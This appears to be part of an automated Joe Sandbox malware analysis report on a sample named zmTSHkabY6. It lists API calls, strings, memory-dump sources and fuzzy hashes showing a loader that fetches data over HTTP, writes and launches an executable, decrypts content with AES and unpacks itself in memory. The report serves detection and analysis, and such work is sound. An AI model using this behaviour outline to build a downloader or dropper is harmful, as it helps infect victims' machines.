                                                                    • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017B7
                                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017DD
                                                                      • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 004025A3
                                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401803
                                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401829
                                                                    Strings
                                                                    • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401779
                                                                    • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401807
                                                                    • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004017BB
                                                                    • text, xrefs: 00401B5C
                                                                    • GET, xrefs: 00401F81
                                                                    • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                                    • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
                                                                    • API String ID: 2146599340-3782612381
                                                                    • Opcode ID: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                                    • Instruction ID: 9ba0ec624b0ce2a87a65cb7bdca14d25b7083be08071b54b776f69b68f7f070f
                                                                    • Opcode Fuzzy Hash: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                                    • Instruction Fuzzy Hash: 34316171E00108EBDB14DFA9DC85FEEBBB9EB48714F60812AE121771C0C778A644CBA5

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00E8024D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID: cess$kernel32.dll
                                                                    • API String ID: 4275171209-1230238691
                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                    • Instruction ID: 42f56b1078da874e31e861965301d6022a0c63e1c579795fd0a01c2c3590a7ff
                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                    • Instruction Fuzzy Hash: 59526974A01229DFDBA4DF58C984BA8BBB1BF09304F1480D9E54DAB351DB30AE89DF14

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                                    • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                                    • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                                    • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                                    • String ID: text
                                                                    • API String ID: 1154000607-999008199
                                                                    • Opcode ID: ef5d7d216a18ec56db342af81d74b206b9fa8c043ee2a269581b6d989e9df7a9
                                                                    • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                                    • Opcode Fuzzy Hash: ef5d7d216a18ec56db342af81d74b206b9fa8c043ee2a269581b6d989e9df7a9
                                                                    • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                                      • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: .exe$open
                                                                    • API String ID: 1627157292-49952409
                                                                    • Opcode ID: e4384984b18e181fb1594b7b9fac09415766b676974dc2044245fe05013f5668
                                                                    • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                                    • Opcode Fuzzy Hash: e4384984b18e181fb1594b7b9fac09415766b676974dc2044245fe05013f5668
                                                                    • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: http://
                                                                    • API String ID: 0-1121587658
                                                                    • Opcode ID: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                                    • Instruction ID: beb1f9afae3dc46702148b7d116b1b3e2c798cd3d3ea86b197954d74152ad0ce
                                                                    • Opcode Fuzzy Hash: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                                    • Instruction Fuzzy Hash: F451C371E002099FDB14CFA8C885BEEBBB5EF48314F20812EE915B72C1D7799945CBA4

                                                                    Control-flow Graph

                                                                    control_flow_graph 1268 4020c0-4020db 1269 40213b-40214c call 408ec2 1268->1269 1270 4020dd-4020e1 1268->1270 1270->1269 1272 4020e3-402101 CreateFileA 1270->1272 1272->1269 1274 402103-402130 WriteFile CloseHandle call 408ec2 1272->1274 1276 402135-402138 1274->1276
                                                                    APIs
                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020F6
                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402117
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040211E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleWrite
                                                                    • String ID:
                                                                    • API String ID: 1065093856-0
                                                                    • Opcode ID: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                                    • Instruction ID: 54406537bc71ee86772d4e0f102f4040d02d69394e2def86726d8d124470bd26
                                                                    • Opcode Fuzzy Hash: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                                    • Instruction Fuzzy Hash: 4401D671610204ABD720DF68DD49FEEB7A8EB48725F00053EFA45AA2D0DAB46945C758

                                                                    Control-flow Graph

                                                                    control_flow_graph 1298 e80e0f-e80e24 SetErrorMode * 2 1299 e80e2b-e80e2c 1298->1299 1300 e80e26 1298->1300 1300->1299
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000400,?,?,00E80223,?,?), ref: 00E80E19
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00E80223,?,?), ref: 00E80E1E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                    • Instruction ID: 34b653c2dc5dadcc2651f6bcb337af8a023bc7c0bed43e17be107cd3fc2d115a
                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                    • Instruction Fuzzy Hash: 45D0123114512877DB403A94DC09BCE7B1CDF05B66F008411FB0DE9080C770994047E5
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,00AA3596,00000004,?), ref: 00AA3636
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000AA2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA2000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_aa2000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: de12bafecc2530df9efbd6cf182ebc136d0b01a7ffe5fa73dcc0002c1f416683
                                                                    • Instruction ID: 769b0f7eaf8e9c3194317a445979826e0d3aed7d8ab4f2251e65705fe60bfc66
                                                                    • Opcode Fuzzy Hash: de12bafecc2530df9efbd6cf182ebc136d0b01a7ffe5fa73dcc0002c1f416683
                                                                    • Instruction Fuzzy Hash: BD31A1F750C2167EEB01CE159A10AFB376DEBD3720B34802AF801C7A82D3655E155639
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,00AA3596,00000004,?), ref: 00AA3636
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000AA2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA2000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_aa2000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: d43fce2ee58e1ba4b7303565dae311f173d2388b2eeed287dcc6b912ee1570b2
                                                                    • Instruction ID: 5bad60c082ee768296ed2c77f441393f82c901bdf53416376523a8ce652617ff
                                                                    • Opcode Fuzzy Hash: d43fce2ee58e1ba4b7303565dae311f173d2388b2eeed287dcc6b912ee1570b2
                                                                    • Instruction Fuzzy Hash: 041181B390920AAFEF40CF159A44AAF7769EFD6720F348416F801C7A85C3755E249729
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,00AA3596,00000004,?), ref: 00AA3636
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000AA2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA2000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_aa2000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: b862117d27f85cd84fa2917d22e7f13e4331aba6759ca44eb9ee7deb113357d1
                                                                    • Instruction ID: a59e1c5ac33bc73d76c8550af82620ac40288bd0ee92fddddc0d172866cf53e2
                                                                    • Opcode Fuzzy Hash: b862117d27f85cd84fa2917d22e7f13e4331aba6759ca44eb9ee7deb113357d1
                                                                    • Instruction Fuzzy Hash: BD11C4B360420AAFEF00CE158A04AEB3765EF96320F348426F801C7A81C3755E219629
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.000000000099D000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_99d000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: a7bc5add78922d73a9499dd7d78903ce499d0649daa8122f62c0a14b9430987d
                                                                    • Instruction ID: e2ff5291c08e46e21a775263e56d772a9931f117b7f127a7dda4597b6599cc35
                                                                    • Opcode Fuzzy Hash: a7bc5add78922d73a9499dd7d78903ce499d0649daa8122f62c0a14b9430987d
                                                                    • Instruction Fuzzy Hash: D50112B240E304EFC741AF25988447AFBF4FF15721F5A4C1DE8C986600D6359990EB97
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.000000000099D000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_99d000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: cad59f033554f98692acc1e301306503d8627c2d6ef33ac4952f03ac4910fcad
                                                                    • Instruction ID: 0dcf3fd80cd97029181ec2417e11feb7dbe780f22d46465859339e191d008b4c
                                                                    • Opcode Fuzzy Hash: cad59f033554f98692acc1e301306503d8627c2d6ef33ac4952f03ac4910fcad
                                                                    • Instruction Fuzzy Hash: 111153B240E300EFD341AF24988447AFBF4FF06721F1A4C1EE8C58A100D23598A1EB97
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                                    • Instruction ID: ad8272dea5af250e00f6a395d7f300feb0e2b911a381963764dc482fc342fffd
                                                                    • Opcode Fuzzy Hash: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                                    • Instruction Fuzzy Hash: B4E03031205225AAD73126A69E00BDB3A589B417A4F154233EC04E66D1DBAC9CE182AD
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                                                    • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                                    • Opcode Fuzzy Hash: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                                                    • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0040E27B
                                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapLast_free
                                                                    • String ID:
                                                                    • API String ID: 1353095263-0
                                                                    • Opcode ID: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                                                    • Instruction ID: def2e2de252ffdbb94672f6279d5865abf5ab7644d9ffbe49541578f7e328dd5
                                                                    • Opcode Fuzzy Hash: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                                                    • Instruction Fuzzy Hash: 82C08C31100208BBCB00DB46C806B8E7FA8DB803A8F204049F40417251DAB1EE409680
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00D9A0B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D99000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d99000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                    • Instruction ID: e095eccbdefd9456288b30fbfba45d82e60c3743a789a76298d1ab933540fe39
                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                    • Instruction Fuzzy Hash: 16113C79A00208EFDB01DF98C985E98BBF5EF08750F158094F9489B362D371EA90DF91
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402BFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                                    • Instruction ID: c3e6f36c677934e3fb1d6ceeea9da9d01375f90aa72a3d22a0593b590ebbe711
                                                                    • Opcode Fuzzy Hash: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                                    • Instruction Fuzzy Hash: F7C0013200020DFBCF025F81EC0489A7F2AEB09264F008020FA1804021C7329931ABA9
                                                                    APIs
                                                                    • VirtualFree.KERNELBASE(?,?,?), ref: 00402C1C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                                    • Instruction ID: 60d78a83612f02709208ad56537e98f16bf966ab6139b9664c308e167d28ca00
                                                                    • Opcode Fuzzy Hash: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                                    • Instruction Fuzzy Hash: 61B0923244020CFBCF021F81EC048D93F2AFB08264F008024FA1C44031C733D531AB84
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DFEK$FOKD$]DFE$rB$rB$rB$rB$rB
                                                                    • API String ID: 0-735762442
                                                                    • Opcode ID: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                                    • Instruction ID: 43d4528cecb88308f3f6741d71b7c28e50935321e00360ac77c5189546c4c90b
                                                                    • Opcode Fuzzy Hash: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                                    • Instruction Fuzzy Hash: DBE2BDB1D002589BDB24FB64CC49BEDB7B4AF11304F5091E8E51D3B292DB759A88CFA1
                                                                    APIs
                                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042A018), ref: 00E837A7
                                                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00E837CB
                                                                    • _mbstowcs.LIBCMT ref: 00E8381E
                                                                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 00E83835
                                                                    • GetLastError.KERNEL32 ref: 00E8383F
                                                                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00E83867
                                                                    • GetLastError.KERNEL32 ref: 00E83871
                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00E83881
                                                                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 00E83943
                                                                    • CryptDestroyKey.ADVAPI32(?), ref: 00E839B5
                                                                    Strings
                                                                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00E83783
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                                    • API String ID: 3642901890-63410773
                                                                    • Opcode ID: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                                    • Instruction ID: 3e7380e6a9e996986df0e5fab1ddc4e5d695f20e6536f56e8ebc352cbd789c5f
                                                                    • Opcode Fuzzy Hash: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                                    • Instruction Fuzzy Hash: B2819E71A00218AFEF24AF24CC45B9ABBB5FF89704F1481A9F54DE7291DB319E848F51
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 42(B$7+K$</N$RtSg$tF!$9}o
                                                                    • API String ID: 0-431818091
                                                                    • Opcode ID: 6bf7e8168ddf77ccc7ad43f3e834bec0f921f7e65d16bcb0f6745aa87acfb340
                                                                    • Instruction ID: 8876c9c29971108adc9478358239a20d4dd56f171d5f30d962ef71d102bd6ef6
                                                                    • Opcode Fuzzy Hash: 6bf7e8168ddf77ccc7ad43f3e834bec0f921f7e65d16bcb0f6745aa87acfb340
                                                                    • Instruction Fuzzy Hash: AEB22AF360C2049FE304AE2DEC8567ABBEAEBD4720F16853DE6C5C3744EA3558058697
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 'Xow$*_~$>}~~$S:Lw$Xu7@$~]6o
                                                                    • API String ID: 0-390478528
                                                                    • Opcode ID: fe956f05fe3a8fefd82318c6c9a3d7ff66bb8d7dcb0648813c0576beba5e6084
                                                                    • Instruction ID: b7a94377f2b34a6a6f183589ebc8863f4eb5368ed07f7449e90df8be8582516a
                                                                    • Opcode Fuzzy Hash: fe956f05fe3a8fefd82318c6c9a3d7ff66bb8d7dcb0648813c0576beba5e6084
                                                                    • Instruction Fuzzy Hash: 19B2F4F3A0C204AFE304AE2DDC8567AFBE9EF94720F16493DE6C487744EA7558408796
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >ij$\[j$c+Zc$qg~$~yGf
                                                                    • API String ID: 0-4179340841
                                                                    • Opcode ID: 06626fb38e8bf8ae9654a10a7870f3c14065af2f82e1263b484bfad921982846
                                                                    • Instruction ID: 232d648357a9d41b29c0ff59ae1242ae536153a9620680ed57216a287fc5a566
                                                                    • Opcode Fuzzy Hash: 06626fb38e8bf8ae9654a10a7870f3c14065af2f82e1263b484bfad921982846
                                                                    • Instruction Fuzzy Hash: 7BB23AF3A0C204AFE7046E2DEC8567AFBE9EF94720F164A3DE6C4C3744E93558058696
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: eo$4z_w$:v$D:?$]yW
                                                                    • API String ID: 0-2756926016
                                                                    • Opcode ID: 9098fc044b2948ceed0df36a859d03588c8f80d68aa8f604f31d67949527f5a1
                                                                    • Instruction ID: 5420738706be5fa183929c9120046456c07f9f606a78d8356a49f423f30fbe8c
                                                                    • Opcode Fuzzy Hash: 9098fc044b2948ceed0df36a859d03588c8f80d68aa8f604f31d67949527f5a1
                                                                    • Instruction Fuzzy Hash: ACB2E5F3A0C200AFE704AE29EC8577ABBE5EF94320F16493DE6C5C3744E63598058696
                                                                    Strings
                                                                    Memory Dump Source
